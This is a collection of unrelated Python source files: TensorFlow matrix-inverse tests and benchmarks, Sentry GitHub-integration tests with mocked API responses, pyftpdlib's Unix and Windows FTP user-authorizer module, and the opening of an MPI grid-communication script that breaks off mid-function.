matrix2 = np.array([[1., 3.], [3., 5.]])
self._verifyInverseReal(matrix1)
self._verifyInverseReal(matrix2)
# A multidimensional batch of 2x2 matrices
self._verifyInverseReal(self._makeBatch(matrix1, matrix2))
matrix1 = matrix1.astype(np.complex64)
matrix1 += 1j * matrix1
matrix2 = matrix2.astype(np.complex64)
matrix2 += 1j * matrix2
self._verifyInverseComplex(matrix1)
self._verifyInverseComplex(matrix2)
# Complex batch
self._verifyInverseComplex(self._makeBatch(matrix1, matrix2))
def testSymmetricPositiveDefinite(self):
# 2x2 matrices
matrix1 = np.array([[2., 1.], [1., 2.]])
matrix2 = np.array([[3., -1.], [-1., 3.]])
self._verifyInverseReal(matrix1)
self._verifyInverseReal(matrix2)
# A multidimensional batch of 2x2 matrices
self._verifyInverseReal(self._makeBatch(matrix1, matrix2))
matrix1 = matrix1.astype(np.complex64)
matrix1 += 1j * matrix1
matrix2 = matrix2.astype(np.complex64)
matrix2 += 1j * matrix2
self._verifyInverseComplex(matrix1)
self._verifyInverseComplex(matrix2)
# Complex batch
self._verifyInverseComplex(self._makeBatch(matrix1, matrix2))
@test_util.deprecated_graph_mode_only
def testNonSquareMatrix(self):
# When the inverse of a non-square matrix is attempted we should return
# an error
with self.assertRaises(ValueError):
linalg_ops.matrix_inverse(np.array([[1., 2., 3.], [3., 4., 5.]]))
@test_util.deprecated_graph_mode_only
def testWrongDimensions(self):
# The input to the inverse should be at least a 2-dimensional tensor.
tensor3 = constant_op.constant([1., 2.])
with self.assertRaises(ValueError):
linalg_ops.matrix_inverse(tensor3)
def testNotInvertible(self):
# The input should be invertible.
with self.cached_session():
with self.assertRaisesOpError("Input is not invertible."):
# All rows of the matrix below add to zero.
tensor3 = constant_op.constant([[1., 0., -1.], [-1., 1., 0.],
[0., -1., 1.]])
linalg_ops.matrix_inverse(tensor3).eval()
def testEmpty(self):
self._verifyInverseReal(np.empty([0, 2, 2]))
self._verifyInverseReal(np.empty([2, 0, 0]))
def testRandomSmallAndLarge(self):
np.random.seed(42)
for dtype in np.float32, np.float64, np.complex64, np.complex128:
for batch_dims in [(), (1,), (3,), (2, 2)]:
for size in 8, 31, 32:
shape = batch_dims + (size, size)
matrix = np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape)).reshape(shape).astype(dtype)
self._verifyInverseReal(matrix)
@test_util.deprecated_graph_mode_only
def testConcurrentExecutesWithoutError(self):
with self.session(use_gpu=True) as sess:
all_ops = []
for adjoint_ in True, False:
matrix1 = random_ops.random_normal([5, 5], seed=42)
matrix2 = random_ops.random_normal([5, 5], seed=42)
inv1 = linalg_ops.matrix_inverse(matrix1, adjoint=adjoint_)
inv2 = linalg_ops.matrix_inverse(matrix2, adjoint=adjoint_)
all_ops += [inv1, inv2]
inv = self.evaluate(all_ops)
self.assertAllEqual(inv[0], inv[1])
self.assertAllEqual(inv[2], inv[3])
class MatrixInverseBenchmark(test.Benchmark):
shapes = [
(4, 4),
(10, 10),
(16, 16),
(101, 101),
(256, 256),
(1000, 1000),
(1024, 1024),
(2048, 2048),
(513, 4, 4),
(513, 16, 16),
(513, 256, 256),
]
def _GenerateMatrix(self, shape):
batch_shape = shape[:-2]
shape = shape[-2:]
assert shape[0] == shape[1]
n = shape[0]
matrix = np.ones(shape).astype(np.float32) / (
2.0 * n) + np.diag(np.ones(n).astype(np.float32))
return variables.Variable(np.tile(matrix, batch_shape + (1, 1)))
def benchmarkMatrixInverseOp(self):
for adjoint in False, True:
for shape in self.shapes:
with ops.Graph().as_default(), \
session.Session(config=benchmark.benchmark_config()) as sess, \
ops.device("/cpu:0"):
matrix = self._GenerateMatrix(shape)
inv = linalg_ops.matrix_inverse(matrix, adjoint=adjoint)
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
sess,
control_flow_ops.group(inv),
min_iters=25,
name="matrix_inverse_cpu_{shape}_adjoint_{adjoint}".format(
shape=shape, adjoint=adjoint))
if test.is_gpu_available(True):
with ops.Graph().as_default(), \
session.Session(config=benchmark.benchmark_config()) as sess, \
ops.device("/gpu:0"):
matrix = self._GenerateMatrix(shape)
inv = linalg_ops.matrix_inverse(matrix, adjoint=adjoint)
self.evaluate(variables.global_variables_initializer())
self.run_op_benchmark(
sess,
control_flow_ops.group(inv),
min_iters=25,
name="matrix_inverse_gpu_{shape}_adjoint_{adjoint}".format(
shape=shape, adjoint=adjoint))
if __name__ == "__main__":
test.main()
|
|
from __future__ import absolute_import
import responses
import six
import sentry
from mock import MagicMock
from six.moves.urllib.parse import parse_qs, urlencode, urlparse
from sentry.constants import ObjectStatus
from sentry.integrations.github import GitHubIntegrationProvider
from sentry.models import (
Identity, IdentityProvider, IdentityStatus, Integration, OrganizationIntegration,
Repository, Project
)
from sentry.plugins import plugins
from sentry.testutils import IntegrationTestCase
from tests.sentry.plugins.testutils import GitHubPlugin # NOQA
class GitHubIntegrationTest(IntegrationTestCase):
provider = GitHubIntegrationProvider
def setUp(self):
super(GitHubIntegrationTest, self).setUp()
self.installation_id = 'install_1'
self.user_id = 'user_1'
self.app_id = 'app_1'
self.access_token = 'xxxxx-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx'
self.expires_at = '3000-01-01T00:00:00Z'
self._stub_github()
def _stub_github(self):
responses.reset()
sentry.integrations.github.integration.get_jwt = MagicMock(
return_value='jwt_token_1',
)
sentry.integrations.github.client.get_jwt = MagicMock(
return_value='jwt_token_1',
)
responses.add(
responses.POST,
'https://github.com/login/oauth/access_token',
json={'access_token': self.access_token}
)
responses.add(
responses.POST,
'https://api.github.com/installations/{}/access_tokens'.format(
self.installation_id,
),
json={
'token': self.access_token,
'expires_at': self.expires_at,
}
)
responses.add(
responses.GET,
'https://api.github.com/user',
json={'id': self.user_id}
)
responses.add(
responses.GET,
u'https://api.github.com/installation/repositories',
json={
'repositories': [
{
'id': 1296269,
'name': 'foo',
'full_name': 'Test-Organization/foo',
},
{
'id': 9876574,
'name': 'bar',
'full_name': 'Test-Organization/bar',
},
],
}
)
responses.add(
responses.GET,
u'https://api.github.com/app/installations/{}'.format(
self.installation_id,
),
json={
'id': self.installation_id,
'app_id': self.app_id,
'account': {
'login': 'Test Organization',
'avatar_url': 'http://example.com/avatar.png',
'html_url': 'https://github.com/Test-Organization',
'type': 'Organization',
},
}
)
responses.add(
responses.GET,
u'https://api.github.com/user/installations',
json={
'installations': [{'id': self.installation_id}],
}
)
def assert_setup_flow(self):
resp = self.client.get(self.init_path)
assert resp.status_code == 302
redirect = urlparse(resp['Location'])
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/apps/sentry-test-app'
# App installation ID is provided
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({'installation_id': self.installation_id})
))
redirect = urlparse(resp['Location'])
assert resp.status_code == 302
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/login/oauth/authorize'
params = parse_qs(redirect.query)
assert params['state']
assert params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert params['response_type'] == ['code']
assert params['client_id'] == ['github-client-id']
# Compact list values into singular values, since there's only ever one.
authorize_params = {k: v[0] for k, v in six.iteritems(params)}
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({
'code': 'oauth-code',
'state': authorize_params['state'],
})
))
oauth_exchange = responses.calls[0]
req_params = parse_qs(oauth_exchange.request.body)
assert req_params['grant_type'] == ['authorization_code']
assert req_params['code'] == ['oauth-code']
assert req_params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert req_params['client_id'] == ['github-client-id']
assert req_params['client_secret'] == ['github-client-secret']
assert oauth_exchange.response.status_code == 200
auth_header = responses.calls[2].request.headers['Authorization']
assert auth_header == 'Bearer jwt_token_1'
self.assertDialogSuccess(resp)
return resp
@responses.activate
def test_plugin_migration(self):
accessible_repo = Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id=123,
)
inaccessible_repo = Repository.objects.create(
organization_id=self.organization.id,
name='Not-My-Org/other',
provider='github',
external_id=321,
)
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
# Updates the existing Repository to belong to the new Integration
assert Repository.objects.get(
id=accessible_repo.id,
).integration_id == integration.id
# Doesn't touch Repositories not accessible by the new Integration
assert Repository.objects.get(
id=inaccessible_repo.id,
).integration_id is None
@responses.activate
def test_disables_plugin_when_fully_migrated(self):
project = Project.objects.create(
organization_id=self.organization.id,
)
plugin = plugins.get('github')
plugin.enable(project)
# Accessible to new Integration
Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id=123,
)
assert 'github' in [p.slug for p in plugins.for_project(project)]
self.assert_setup_flow()
assert 'github' not in [p.slug for p in plugins.for_project(project)]
@responses.activate
def test_basic_flow(self):
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
assert integration.external_id == self.installation_id
assert integration.name == 'Test Organization'
assert integration.metadata == {
'access_token': self.access_token,
# The metadata doesn't get saved with the timezone "Z" character
# for some reason, so just compare everything but that.
'expires_at': self.expires_at[:-1],
'icon': 'http://example.com/avatar.png',
'domain_name': 'github.com/Test-Organization',
'account_type': 'Organization',
}
oi = OrganizationIntegration.objects.get(
integration=integration,
organization=self.organization,
)
assert oi.config == {}
idp = IdentityProvider.objects.get(type='github')
identity = Identity.objects.get(
idp=idp,
user=self.user,
external_id=self.user_id,
)
assert identity.status == IdentityStatus.VALID
assert identity.data == {
'access_token': self.access_token,
}
@responses.activate
def test_reassign_user(self):
self.assert_setup_flow()
# Associate the identity with a user that has a password.
# Identity should be relinked.
user2 = self.create_user()
Identity.objects.get().update(user=user2)
self.assert_setup_flow()
identity = Identity.objects.get()
assert identity.user == self.user
# Associate the identity with a user without a password.
# Identity should not be relinked.
user2.set_unusable_password()
user2.save()
Identity.objects.get().update(user=user2)
resp = self.assert_setup_flow()
assert '"success":false' in resp.content
assert 'The provided GitHub account is linked to a different user' in resp.content
@responses.activate
def test_reinstall_flow(self):
self._stub_github()
self.assert_setup_flow()
integration = Integration.objects.get(provider=self.provider.key)
integration.update(status=ObjectStatus.DISABLED)
assert integration.status == ObjectStatus.DISABLED
assert integration.external_id == self.installation_id
resp = self.client.get('{}?{}'.format(
self.init_path,
urlencode({'reinstall_id': integration.id})
))
assert resp.status_code == 302
redirect = urlparse(resp['Location'])
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/apps/sentry-test-app'
# New Installation
self.installation_id = 'install_2'
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({'installation_id': self.installation_id})
))
redirect = urlparse(resp['Location'])
assert resp.status_code == 302
assert redirect.scheme == 'https'
assert redirect.netloc == 'github.com'
assert redirect.path == '/login/oauth/authorize'
params = parse_qs(redirect.query)
assert params['state']
assert params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert params['response_type'] == ['code']
assert params['client_id'] == ['github-client-id']
# Compact list values to make the rest of this easier
authorize_params = {k: v[0] for k, v in six.iteritems(params)}
self._stub_github()
resp = self.client.get('{}?{}'.format(
self.setup_path,
urlencode({
'code': 'oauth-code',
'state': authorize_params['state'],
})
))
mock_access_token_request = responses.calls[0].request
req_params = parse_qs(mock_access_token_request.body)
assert req_params['grant_type'] == ['authorization_code']
assert req_params['code'] == ['oauth-code']
assert req_params['redirect_uri'] == ['http://testserver/extensions/github/setup/']
assert req_params['client_id'] == ['github-client-id']
assert req_params['client_secret'] == ['github-client-secret']
assert resp.status_code == 200
auth_header = responses.calls[2].request.headers['Authorization']
assert auth_header == 'Bearer jwt_token_1'
integration = Integration.objects.get(provider=self.provider.key)
assert integration.status == ObjectStatus.VISIBLE
assert integration.external_id == self.installation_id
@responses.activate
def test_disable_plugin_when_fully_migrated(self):
self._stub_github()
project = Project.objects.create(
organization_id=self.organization.id,
)
plugin = plugins.get('github')
plugin.enable(project)
# Accessible to new Integration - mocked in _stub_github
Repository.objects.create(
organization_id=self.organization.id,
name='Test-Organization/foo',
url='https://github.com/Test-Organization/foo',
provider='github',
external_id='123',
)
# Enabled before
assert 'github' in [p.slug for p in plugins.for_project(project)]
self.assert_setup_flow()
# Disabled after Integration installed
assert 'github' not in [p.slug for p in plugins.for_project(project)]
|
|
#!/usr/bin/env python
# $Id: authorizers.py 979 2012-01-23 19:32:22Z g.rodola $
# pyftpdlib is released under the MIT license, reproduced below:
# ======================================================================
# Copyright (C) 2007-2012 Giampaolo Rodola' <g.rodola@gmail.com>
#
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# ======================================================================
"""An "authorizer" is a class handling authentications and permissions
of the FTP server. It is used by pyftpdlib.ftpserver.FTPHandler
class for:
- verifying user password
- getting user home directory
- checking user permissions when a filesystem read/write event occurs
- changing user when accessing the filesystem
This module contains two classes which implements such functionalities
in a system-specific way for both Unix and Windows.
"""
__all__ = []
import os
import errno
from pyftpdlib.ftpserver import DummyAuthorizer, AuthorizerError
def replace_anonymous(callable):
"""A decorator to replace anonymous user string passed to authorizer
methods as first arugument with the actual user used to handle
anonymous sessions.
"""
def wrapper(self, username, *args, **kwargs):
if username == 'anonymous':
username = self.anonymous_user or username
return callable(self, username, *args, **kwargs)
return wrapper
class _Base(object):
"""Methods common to both Unix and Windows authorizers.
Not supposed to be used directly.
"""
def __init__(self):
"""Check for errors in the constructor."""
if self.rejected_users and self.allowed_users:
raise ValueError("rejected_users and allowed_users options are "
"mutually exclusive")
users = self._get_system_users()
for user in (self.allowed_users or self.rejected_users):
if user == 'anonymous':
raise ValueError('invalid username "anonymous"')
if user not in users:
raise ValueError('unknown user %s' % user)
if self.anonymous_user is not None:
if not self.has_user(self.anonymous_user):
raise ValueError('no such user %s' % self.anonymous_user)
home = self.get_home_dir(self.anonymous_user)
if not os.path.isdir(home):
raise ValueError('no valid home set for user %s'
% self.anonymous_user)
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
if not password and not homedir and not perm and not msg_login \
and not msg_quit:
raise ValueError("at least one keyword argument must be specified")
if self.allowed_users and username not in self.allowed_users:
raise ValueError('%s is not an allowed user' % username)
if self.rejected_users and username in self.rejected_users:
raise ValueError('%s is not an allowed user' % username)
if username == "anonymous" and password:
raise ValueError("can't assign password to anonymous user")
if not self.has_user(username):
raise ValueError('no such user %s' % username)
if username in self._dummy_authorizer.user_table:
# re-set parameters
del self._dummy_authorizer.user_table[username]
self._dummy_authorizer.add_user(username, password or "",
homedir or os.getcwd(),
perm or "",
msg_login or "",
msg_quit or "")
if homedir is None:
self._dummy_authorizer.user_table[username]['home'] = ""
def get_msg_login(self, username):
return self._get_key(username, 'msg_login') or self.msg_login
def get_msg_quit(self, username):
return self._get_key(username, 'msg_quit') or self.msg_quit
def get_perms(self, username):
overridden_perms = self._get_key(username, 'perm')
if overridden_perms:
return overridden_perms
if username == 'anonymous':
return 'elr'
return self.global_perm
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
def _get_key(self, username, key):
if self._dummy_authorizer.has_user(username):
return self._dummy_authorizer.user_table[username][key]
def _is_rejected_user(self, username):
"""Return True if the user has been black listed via
allowed_users or rejected_users options.
"""
if self.allowed_users and username not in self.allowed_users:
return True
if self.rejected_users and username in self.rejected_users:
return True
return False
# Note: requires python >= 2.5
try:
import pwd
import spwd
import crypt
except ImportError:
pass
else:
__all__.extend(['BaseUnixAuthorizer', 'UnixAuthorizer'])
# the uid/gid the server runs under
PROCESS_UID = os.getuid()
PROCESS_GID = os.getgid()
class BaseUnixAuthorizer(object):
"""An authorizer compatible with Unix user account and password
database.
This class should not be used directly unless for subclassing.
Use higher-level UnixAuthorizer class instead.
"""
def __init__(self, anonymous_user=None):
if os.geteuid() != 0 or not spwd.getspall():
raise AuthorizerError("super user privileges are required")
self.anonymous_user = anonymous_user
if self.anonymous_user is not None:
if not self.anonymous_user in self._get_system_users():
raise ValueError('no such user %s' % self.anonymous_user)
try:
pwd.getpwnam(self.anonymous_user).pw_dir
except KeyError:
raise ValueError('no such user %s' % anonymous_user)
# --- overridden / private API
def validate_authentication(self, username, password):
"""Authenticates against shadow password db; return
True on success.
"""
if username == "anonymous":
return self.anonymous_user is not None
try:
pw1 = spwd.getspnam(username).sp_pwd
pw2 = crypt.crypt(password, pw1)
except KeyError: # no such username
return False
else:
return pw1 == pw2
@replace_anonymous
def impersonate_user(self, username, password):
"""Change process effective user/group ids to reflect
logged in user.
"""
try:
pwdstruct = pwd.getpwnam(username)
except KeyError:
raise AuthorizerError('no such user %s' % username)
else:
os.setegid(pwdstruct.pw_gid)
os.seteuid(pwdstruct.pw_uid)
def terminate_impersonation(self, username):
"""Revert process effective user/group IDs."""
os.setegid(PROCESS_GID)
os.seteuid(PROCESS_UID)
@replace_anonymous
def has_user(self, username):
"""Return True if user exists on the Unix system.
If the user has been black listed via allowed_users or
rejected_users options always return False.
"""
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
"""Return user home directory."""
try:
return pwd.getpwnam(username).pw_dir
except KeyError:
raise AuthorizerError('no such user %s' % username)
@staticmethod
def _get_system_users():
"""Return all users defined on the UNIX system."""
return [entry.pw_name for entry in pwd.getpwall()]
def get_msg_login(self, username):
return "Login successful."
def get_msg_quit(self, username):
return "Goodbye."
def get_perms(self, username):
return "elradfmw"
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
class UnixAuthorizer(_Base, BaseUnixAuthorizer):
"""A wrapper on top of BaseUnixAuthorizer providing options
to specify what users should be allowed to login, per-user
options, etc.
Example usages:
>>> from pyftpdlib.contrib.authorizers import UnixAuthorizer
>>> # accept all except root
>>> auth = UnixAuthorizer(rejected_users=["root"])
>>>
>>> # accept some users only
>>> auth = UnixAuthorizer(allowed_users=["matt", "jay"])
>>>
>>> # accept everybody and don't care if they have not a valid shell
>>> auth = UnixAuthorizer(require_valid_shell=False)
>>>
>>> # set specific options for a user
>>> auth.override_user("matt", password="foo", perm="elr")
"""
# --- public API
def __init__(self, global_perm="elradfmw",
allowed_users=[],
rejected_users=[],
require_valid_shell=True,
anonymous_user=None,
msg_login="Login successful.",
msg_quit="Goodbye."):
"""Parameters:
- (string) global_perm:
a series of letters referencing the users permissions;
defaults to "elradfmw" which means full read and write
access for everybody (except anonymous).
- (list) allowed_users:
a list of users which are accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (list) rejected_users:
a list of users which are not accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (bool) require_valid_shell:
Deny access for those users which do not have a valid shell
binary listed in /etc/shells.
If /etc/shells cannot be found this is a no-op.
Anonymous user is not subject to this option, and is free
to not have a valid shell defined.
Defaults to True (a valid shell is required for login).
- (string) anonymous_user:
specify it if you intend to provide anonymous access.
The value expected is a string representing the system user
to use for managing anonymous sessions; defaults to None
(anonymous access disabled).
- (string) msg_login:
the string sent when client logs in.
- (string) msg_quit:
the string sent when client quits.
"""
BaseUnixAuthorizer.__init__(self, anonymous_user)
self.global_perm = global_perm
self.allowed_users = allowed_users
self.rejected_users = rejected_users
self.anonymous_user = anonymous_user
self.require_valid_shell = require_valid_shell
self.msg_login = msg_login
self.msg_quit = msg_quit
self._dummy_authorizer = DummyAuthorizer()
self._dummy_authorizer._check_permissions('', global_perm)
_Base.__init__(self)
if require_valid_shell:
for username in self.allowed_users:
if not self._has_valid_shell(username):
raise ValueError("user %s has not a valid shell"
% username)
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
if self.require_valid_shell and username != 'anonymous':
if not self._has_valid_shell(username):
raise ValueError("user %s has not a valid shell"
% username)
_Base.override_user(self, username, password, homedir, perm,
msg_login, msg_quit)
# --- overridden / private API
def validate_authentication(self, username, password):
if username == "anonymous":
return self.anonymous_user is not None
if self._is_rejected_user(username):
return False
if self.require_valid_shell and username != 'anonymous':
if not self._has_valid_shell(username):
return False
overridden_password = self._get_key(username, 'pwd')
if overridden_password:
return overridden_password == password
return BaseUnixAuthorizer.validate_authentication(self, username, password)
@replace_anonymous
def has_user(self, username):
if self._is_rejected_user(username):
return False
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
overridden_home = self._get_key(username, 'home')
if overridden_home:
return overridden_home
return BaseUnixAuthorizer.get_home_dir(self, username)
@staticmethod
def _has_valid_shell(username):
"""Return True if the user has a valid shell binary listed
in /etc/shells. If /etc/shells can't be found return True.
"""
file = None
try:
try:
file = open('/etc/shells', 'r')
except IOError as err:
if err.errno == errno.ENOENT:
return True
raise
else:
try:
shell = pwd.getpwnam(username).pw_shell
except KeyError: # invalid user
return False
for line in file:
if line.startswith('#'):
continue
line = line.strip()
if line == shell:
return True
return False
finally:
if file is not None:
file.close()
# Note: requires pywin32 extension
try:
import _winreg
import win32security
import win32net
import pywintypes
import win32con
import win32api
except ImportError:
pass
else:
__all__.extend(['BaseWindowsAuthorizer', 'WindowsAuthorizer'])
class BaseWindowsAuthorizer(object):
"""An authorizer compatible with Windows user account and
password database.
This class should not be used directly unless for subclassing.
Use higher-level WinowsAuthorizer class instead.
"""
def __init__(self, anonymous_user=None, anonymous_password=None):
# actually try to impersonate the user
self.anonymous_user = anonymous_user
self.anonymous_password = anonymous_password
if self.anonymous_user is not None:
self.impersonate_user(self.anonymous_user,
self.anonymous_password)
self.terminate_impersonation()
def validate_authentication(self, username, password):
if username == "anonymous":
return self.anonymous_user is not None
try:
win32security.LogonUser(username, None, password,
win32con.LOGON32_LOGON_INTERACTIVE,
win32con.LOGON32_PROVIDER_DEFAULT)
except pywintypes.error:
return False
else:
return True
@replace_anonymous
def impersonate_user(self, username, password):
"""Impersonate the security context of another user."""
handler = win32security.LogonUser(username, None, password,
win32con.LOGON32_LOGON_INTERACTIVE,
win32con.LOGON32_PROVIDER_DEFAULT)
win32security.ImpersonateLoggedOnUser(handler)
handler.Close()
def terminate_impersonation(self, username):
"""Terminate the impersonation of another user."""
win32security.RevertToSelf()
@replace_anonymous
def has_user(self, username):
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
"""Return the user's profile directory, the closest thing
to a user home directory we have on Windows.
"""
try:
sid = win32security.ConvertSidToStringSid(
win32security.LookupAccountName(None, username)[0])
except pywintypes.error as err:
raise AuthorizerError(err)
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + \
"\\" + sid
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, path)
except WindowsError:
raise AuthorizerError("No profile directory defined for user %s"
% username)
value = _winreg.QueryValueEx(key, "ProfileImagePath")[0]
return win32api.ExpandEnvironmentStrings(value)
@classmethod
def _get_system_users(cls):
"""Return all users defined on the Windows system."""
return [entry['name'] for entry in win32net.NetUserEnum(None, 0)[0]]
def get_msg_login(self, username):
return "Login successful."
def get_msg_quit(self, username):
return "Goodbye."
def get_perms(self, username):
return "elradfmw"
def has_perm(self, username, perm, path=None):
return perm in self.get_perms(username)
class WindowsAuthorizer(_Base, BaseWindowsAuthorizer):
"""A wrapper on top of BaseWindowsAuthorizer providing options
to specify what users should be allowed to login, per-user
options, etc.
Example usages:
>>> from pyftpdlib.contrib.authorizers import WindowsAuthorizer
>>> # accept all except Administrator
>>> auth = UnixAuthorizer(rejected_users=["Administrator"])
>>>
>>> # accept some users only
>>> auth = UnixAuthorizer(allowed_users=["matt", "jay"])
>>>
>>> # set specific options for a user
>>> auth.override_user("matt", password="foo", perm="elr")
"""
# --- public API
def __init__(self, global_perm="elradfmw",
allowed_users=[],
rejected_users=[],
anonymous_user=None,
anonymous_password=None,
msg_login="Login successful.",
msg_quit="Goodbye."):
"""Parameters:
- (string) global_perm:
a series of letters referencing the users permissions;
defaults to "elradfmw" which means full read and write
access for everybody (except anonymous).
- (list) allowed_users:
a list of users which are accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (list) rejected_users:
a list of users which are not accepted for authenticating
against the FTP server; defaults to [] (no restrictions).
- (string) anonymous_user:
specify it if you intend to provide anonymous access.
The value expected is a string representing the system user
to use for managing anonymous sessions.
As for IIS, it is recommended to use Guest account.
The common practice is to first enable the Guest user, which
is disabled by default and then assign an empty password.
Defaults to None (anonymous access disabled).
- (string) anonymous_password:
the password of the user who has been chosen to manage the
anonymous sessions. Defaults to None (empty password).
- (string) msg_login:
the string sent when client logs in.
- (string) msg_quit:
the string sent when client quits.
"""
self.global_perm = global_perm
self.allowed_users = allowed_users
self.rejected_users = rejected_users
self.anonymous_user = anonymous_user
self.anonymous_password = anonymous_password
self.msg_login = msg_login
self.msg_quit = msg_quit
self._dummy_authorizer = DummyAuthorizer()
self._dummy_authorizer._check_permissions('', global_perm)
_Base.__init__(self)
# actually try to impersonate the user
if self.anonymous_user is not None:
self.impersonate_user(self.anonymous_user,
self.anonymous_password)
self.terminate_impersonation()
def override_user(self, username, password=None, homedir=None, perm=None,
msg_login=None, msg_quit=None):
"""Overrides the options specified in the class constructor
for a specific user.
"""
_Base.override_user(self, username, password, homedir, perm,
msg_login, msg_quit)
# --- overridden / private API
def validate_authentication(self, username, password):
"""Authenticates against Windows user database; return
True on success.
"""
if username == "anonymous":
return self.anonymous_user is not None
if self.allowed_users and username not in self.allowed_users:
return False
if self.rejected_users and username in self.rejected_users:
return False
overridden_password = self._get_key(username, 'pwd')
if overridden_password:
return overridden_password == password
else:
return BaseWindowsAuthorizer.validate_authentication(self,
username, password)
def impersonate_user(self, username, password):
"""Impersonate the security context of another user."""
if username == "anonymous":
username = self.anonymous_user or ""
password = self.anonymous_password or ""
return BaseWindowsAuthorizer.impersonate_user(self, username, password)
@replace_anonymous
def has_user(self, username):
if self._is_rejected_user(username):
return False
return username in self._get_system_users()
@replace_anonymous
def get_home_dir(self, username):
overridden_home = self._get_key(username, 'home')
if overridden_home:
return overridden_home
return BaseWindowsAuthorizer.get_home_dir(self, username)
|
|
try:
from numba import autojit
except ImportError:
print "Unable to import numba, life_step will not be accelerated"
def autojit(func):
return func
import itertools
import numpy as np
from mpi4py import MPI
def communicate(grid, left, right, up, down):
""" Communicates grid data.
Performs a simulated inner 'put' from grid into two left-right neighbors, then a full 'put' from grid into up-down neighbors"""
if left != None:
left[1:-1,-1] = grid[1:-1,1]
if right != None:
right[1:-1,0] = grid[1:-1,-2]
if up != None:
up[-1,:] = grid[1,:]
if down != None:
down[0,:] = grid[-2,:]
def parallel_communicate(grid, left, right, up, down):
""" Communicates parallel grid data.
Performs a simulated inner 'put' from grid into two left-right neighbors, then a full 'put' from grid into up-down neighbors"""
if left != None:
left[1:-1,-1] = grid[1:-1,1]
if right != None:
right[1:-1,0] = grid[1:-1,-2]
if up != None:
up[-1,:] = grid[1,:]
if down != None:
down[0,:] = grid[-2,:]
def build_grids(A, ng):
"""Create a decomposition of the grids on A"""
shape = A.shape
gridl = [s/n for s,n in zip(shape,ng)]
gs = [[l * i for i in range(ngi)] for ngi,l in zip(ng,gridl)]
gs = list(itertools.product(*gs))
slices = [[(slice(i,i+l)) for i, l in zip(gsi,gridl)] for gsi in gs]
sliceA = [slice(0,s) for s in shape]
return sliceA, slices, [A[i] for i in slices]
def build_local_grids(A, ng):
"""Create a copy of the local grids on A"""
shape = A.shape
gridl = [s/n for s,n in zip(shape,ng)]
lgs = [[l*i-1 if i > 0 else 0 for i in range(ngi)] for ngi,l in zip(ng, gridl)]
lge = [[l*(i+1)+1 if i+1 < ngi else l*(i+1) for i in range(ngi)] for ngi,l in zip(ng, gridl)]
lgs = list(itertools.product(*lgs))
lge = list(itertools.product(*lge))
lslices = [[slice(i,j) for i, j in zip(gsi, gei)] for gsi, gei in zip(lgs, lge)]
return [A[i].copy() for i in lslices]
class Comms:
"""encapsulates cartesian communications"""
def __init__(self):
size = MPI.COMM_WORLD.Get_size()
ngs = int(np.sqrt(size))
ng = [ngs, ngs]
cart = MPI.COMM_WORLD.Create_cart(ng, reorder=True)
self.left_buf = None
self.right_buf = None
coords = cart.coords
c = np.asarray(coords)
self.ng = ng
self.cart = cart
self.reqs = []
# get neighbors filtered by boundaries
self.left = cart.Get_cart_rank(c - [0,1]) if c[1] > 0 else None
self.right = cart.Get_cart_rank(c + [0,1]) if c[1] < ng[1] - 1 else None
self.down = cart.Get_cart_rank(c - [1,0]) if c[0] > 0 else None
self.up = cart.Get_cart_rank(c + [1,0]) if c[0] < ng[0] - 1 else None
self.left_sbuf = None
self.left_rbuf = None
self.right_sbuf = None
self.right_rbuf = None
self.buffered_grid = None
rank = self.cart.Get_rank()
def comm_start_1(self, grid):
cart = self.cart
# special handling for non-contiguous data
if self.left_sbuf is None:
self.left_sbuf = np.empty((grid.shape[0]-2), np.int)
